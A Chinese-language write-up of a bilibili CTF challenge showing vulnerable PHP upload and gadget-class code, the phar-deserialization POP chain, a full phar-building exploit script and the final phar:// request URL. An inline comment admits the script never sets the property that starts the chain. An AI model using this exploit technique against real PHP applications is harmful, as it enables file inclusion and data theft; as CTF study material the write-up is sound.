bilibili 1024 安全攻防挑战赛 第二题
天真可爱路西法小天使
编辑于 2022年11月01日 15:27

拿到题目地址后先对目标做信息收集,发现 upload 上传入口。

//5d47c5d8a6299792.php
<?php
// flag in /tmp/flag.php
class Modifier {
    /**
     * Invoking a Modifier instance as a function includes index.php.
     * Appears unused in the visible code; kept as given.
     */
    public function __invoke()
    {
        include 'index.php';
    }
}
class Action {
    protected $checkAccess; // path handed to include() in run(); attacker-chosen once the object is unserialized
    protected $id;          // selector for run(); compared strictly first, then loosely by switch()
    /**
     * Include $checkAccess when $id "is 0".
     *
     * The guard uses strict comparison (!== 0 and !== 1) but switch() compares
     * with loose ==, so a value such as the string "0" passes the guard and
     * still matches case 0 ("0" == 0 is true). The strpos() filter only rejects
     * paths containing "upload"; it does not confine the directory, so a path
     * like /tmp/flag.php is accepted.
     */
    public function run()
    {
        // Deny list on the substring "upload" only (blocks including the upload dir itself).
        if(strpos($this->checkAccess, 'upload') !== false){
            echo "error path";
            exit();
        }
        // Strict: the ints 0 and 1 are rejected here...
        if ($this->id !== 0 && $this->id !== 1) {
            // ...but switch() matches loosely, so "0" reaches case 0.
            switch($this->id) {
                case 0:
                    if ($this->checkAccess) {
                        include($this->checkAccess); // file inclusion of an attacker-controlled path
                    }
                    break;
                case 1:
                    throw new Exception("id invalid in ".__CLASS__.__FUNCTION__);
                    break;
                default:
                    break;
            }
        }
    }
}
class Content {
    public $formatters;
    /**
     * Resolve a formatter name to a callable.
     *
     * Entries already present in $this->formatters are returned as-is, with no
     * check on what they contain. Otherwise $this->providers (not declared on
     * the class; set dynamically) is scanned for an object exposing a method of
     * that name, the [object, method] pair is cached in $formatters and returned.
     *
     * @throws \InvalidArgumentException when no formatter matches
     */
    public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }
        $resolved = null;
        foreach ($this->providers as $candidate) {
            if (!method_exists($candidate, $formatter)) {
                continue;
            }
            $resolved = array($candidate, $formatter);
            break;
        }
        if ($resolved === null) {
            throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
        }
        $this->formatters[$formatter] = $resolved;
        return $this->formatters[$formatter];
    }
    /**
     * Forward any undefined method call to the formatter of the same name.
     * Whatever $formatters maps the name to is invoked with the caller's arguments.
     */
    public function __call($name, $arguments)
    {
        $callable = $this->getFormatter($name);
        return call_user_func_array($callable, $arguments);
    }
}
class Show{
    public $source;   // the only property __wakeup inspects; an object here gets stringified by preg_match()
    public $str;      // __toString calls $this->str->reset() on whatever object this holds after unserialize
    public $reader;   // reset() calls $this->reader->close()
    /**
     * Sets $source and echoes a banner.
     * Not run by unserialize(), so it plays no part in the phar chain.
     */
    public function __construct($file='index.php') {
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    /**
     * String-conversion hook: calls reset() on $str.
     * Never returns a string (on PHP 8 this ends in a TypeError, but only after reset() has run).
     */
    public function __toString() {
        $this->str->reset();
    }

    /**
     * Runs on unserialize(). The case-insensitive deny list covers only $source,
     * not the path upload.php passes to file_exists(). Passing $source to preg_match()
     * converts an object stored there to a string, i.e. it invokes that object's __toString().
     */
    public function __wakeup() {

        if(preg_match("/gopher|phar|http|file|ftp|dict|\.\./i", $this->source)) {
            throw new Exception('invalid protocol found in '.__CLASS__);
        }
    }
    /** Closes $reader when set; if $reader is a Content, close() goes through Content::__call. */
    public function reset() {
        if ($this->reader !== null) {
            $this->reader->close();
        }
    }
}
// Prints this file's own source to the visitor; this is how the listing above is obtained.
highlight_file(__FILE__);

5d47c5d8a6299792.php

//upload.php
<?php 
    // Upload endpoint of the challenge: POST stores a file under upload/, GET ?c=... probes a path.
    header("content-type:text/html;charset=utf-8");
    
    date_default_timezone_set('PRC');

    if($_SERVER['REQUEST_METHOD']==='POST') {
        
        // No isset() guard: a POST without a "file" part raises notices here.
        $filename = $_FILES['file']['name'];
        $temp_name = $_FILES['file']['tmp_name'];
        $size = $_FILES['file']['size'];
        $error = $_FILES['file']['error'];
        // 2 MiB cap on the reported size.
        if ($size > 2*1024*1024){
            echo "<script>alert('文件过大');window.history.go(-1);</script>";
            exit();
        }
        
        // Allowlist on the last extension only (pathinfo); in_array is non-strict.
        // File content is never inspected, so any bytes (e.g. a phar archive) with an allowed suffix are stored.
        $arr = pathinfo($filename);
        $ext_suffix = $arr['extension'];
        $allow_suffix = array('jpg','gif','jpeg','png');
        if(!in_array($ext_suffix, $allow_suffix)){  
            echo "<script>alert('只能是jpg,gif,jpeg,png');window.history.go(-1);</script>";
            exit();
        }
        
        // Stored name = timestamp + rand(100,1000) + original suffix; the full path is echoed below,
        // so it never has to be guessed.
        $new_filename = date('YmdHis',time()).rand(100,1000).'.'.$ext_suffix; 
        move_uploaded_file($temp_name, 'upload/'.$new_filename);
        echo "success save in: ".'upload/'.$new_filename;

    } else if ($_SERVER['REQUEST_METHOD']==='GET') {
        if (isset($_GET['c'])){
            // Loads the gadget classes (Modifier/Action/Content/Show) into scope before the path is touched.
            include("5d47c5d8a6299792.php");
            $fpath = $_GET['c'];
            // Sink: $_GET['c'] reaches file_exists() with no scheme check. A phar:// path makes PHP parse
            // the archive and unserialize its meta-data, which is what runs Show::__wakeup.
            // The deny list in Show::__wakeup only inspects $source, not this parameter.
            if(file_exists($fpath)){
                echo "file exists";
            } else { 
                echo "file not exists";
            }
        } else {
            highlight_file(__FILE__);
        } 
    }  
 ?>

根据评论区提示,这题考的是 phar 反序列化(借用套神的话:靠的是积累和对特征的敏感;题做少了才看不出来,做多了一眼就能认出)。

这里简述phar

    PHP 中相当一部分文件系统函数(file_exists 等)在通过 phar:// 伪协议解析 phar 文件时,都会对其 meta-data 做 unserialize,因此只要 meta-data 可控就存在反序列化漏洞。本题中 upload.php 对 $_GET['c'] 直接调用 file_exists() 且未过滤协议,正是这样的触发点。详细原理:https://paper.seebug.org/680/

POP 链:__construct → __toString → reset → Content → __call → close,并令 $this->formatters['reset'] = [new Action(), 'run'],这样 Content::__call('reset') 直接调到 Action::run。注意反序列化时并不会执行 __construct,真正的入口是 __wakeup 中对 $this->source 的 preg_match,它会把 source 指向的对象转成字符串,从而触发 __toString。

生成 phar(本地生成时需要 php.ini 中 phar.readonly=Off,或用 php -d phar.readonly=0 运行脚本)

<?php
// Declared only so the class set matches the target's; never instantiated below.
class Modifier {
}
// Mirror of the target's Action; only the two protected properties matter for serialization.
class Action {
    protected $checkAccess="/tmp/flag.php";   // included by Action::run(); must not contain "upload"
    protected $id="0";                        // string "0": passes the strict !== 0 guard, still matches case 0 under switch's loose ==
}
// Mirror of the target's Content; $providers is not declared in either copy and is set dynamically below.
class Content{
    public $formatters;
}
// Mirror of the target's Show, without its constructor, so `new show()` neither echoes nor sets $source.
class Show{
    public $source;
    public $str;
    public $reader;
}
// Build the object graph that becomes the phar meta-data.
$a=new show();                     // outer Show; Show::__wakeup runs on it when the target stat()s the phar
$content=new Content();
$action = new Action();            // checkAccess="/tmp/flag.php", id="0" (see class above)
$a->str=$content;                  // Show::__toString calls $this->str->reset()
// Content has no reset(), so __call('reset') consults formatters first and gets [Action, 'run'].
$content->formatters=array('reset'=>array($action,'run'));
$content->providers = [$a,];       // dynamic property; only consulted for names missing from formatters
$a->str = $content;                // duplicate of the assignment above; harmless
$a->reader = $content;             // only read by Show::reset(), which the chain as laid out never calls
// NOTE(review): $a->source is never assigned here, yet the preg_match on $source in Show::__wakeup
// is what would stringify it and reach __toString; confirm whether a Show object has to be placed
// in $a->source for the chain to fire.


$phar = new Phar("phar.phar");     // writing a phar requires phar.readonly=Off
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");  // minimal stub; the phar wrapper requires __HALT_COMPILER
$phar->setMetadata($a);            // serialized here; unserialized by the target on any phar:// access
$phar->addFromString("test.txt", "test");       // archive needs at least one file
$phar->stopBuffering();
?>

把生成的 phar 改成允许的后缀(如 .jpg/.png;上传只校验后缀不校验内容,而 phar:// 也不要求 .phar 后缀)后通过 upload.html 上传,用返回的保存路径构造最终 payload:http://42.192.54.239/upload.php?c=phar://upload/<返回的文件名>

获得flag和第5题提示